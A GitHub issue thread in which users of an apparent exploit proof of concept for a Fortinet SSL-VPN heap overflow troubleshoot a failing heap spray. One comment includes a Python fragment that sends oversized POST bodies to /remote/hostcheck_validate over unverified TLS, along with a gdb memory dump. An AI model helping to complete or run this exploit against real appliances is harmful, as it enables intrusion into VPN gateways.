-
Notifications
You must be signed in to change notification settings - Fork 20
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
My heapspray has never been successful. I don't know if there is something wrong with the way I send packages. #4
Comments
I got the same results with the heap spray. Can’t seem to get a response from the user tho. |
Yes, I tested it today and it didn't effectively result in heap spray, I only managed to heap spray xxxx0a0d to overwrite it with 0x42424242 once, but the offsets in it were still wrong |
It's still not working. I may need to change the way I send out packages. |
In the Assetnote blog I noticed with gdb the first request was made with calloc. But with mine shows malloc. I have tested golang and the result is the same. Something questionable about that poc maybe another blog explains it. |
Did you manage the heap spray? |
Hi, thank you for sharing, have you solved it? I also encountered the same problem |
Yes, it's been resolved. |
Hey @AshLQ, I'm running into a similar issue trying to test this on 7.4.2. Would you be able to share how you got the PoC working? It would be much appreciated. |
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
def send_req(req):
try:
s = socket.create_connection(host, timeout=20)
except:
return -1
ss = context.wrap_socket(s)
ss.sendall(req)
body = (b"B" * 1808 + b"=" + form_value + b"&") * 20
data = b"POST /remote/hostcheck_validate HTTP/1.1\r\n"
data += b"Host: 192.168.81.100\r\n"
data += f"Content-Length: {len(body)}\r\n".encode("utf-8")
data += b"\r\n"
data += body
print('heap spray')
send_req(data)
(remote) gef➤ x/100gx 0x00007fc6897c0a0d
0x7fc6897c0a0d: 0xc6897c0ec800007f 0xc6898b6c3000007f
0x7fc6897c0a1d: 0xc6898b6c4000007f 0x000000000000007f
0x7fc6897c0a2d: 0xc6898b6c18000000 0xc6898b6c1e00007f
0x7fc6897c0a3d: 0x000000000000007f 0x0000000000000000
0x7fc6897c0a4d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0a5d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0a6d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0a7d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0a8d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0a9d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0aad: 0x0000000000000000 0x0000000000000000
0x7fc6897c0abd: 0x0000000000000000 0x0000000000000000
0x7fc6897c0acd: 0x0000000000000000 0x0000000000000000
0x7fc6897c0add: 0x0000000000000000 0x0000000000000000
0x7fc6897c0aed: 0x0000000000000000 0x0000000000000000
0x7fc6897c0afd: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b0d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b1d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b2d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b3d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b4d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b5d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b6d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b7d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b8d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b9d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0bad: 0x0000000000000000 0x0000000000000000
The text was updated successfully, but these errors were encountered: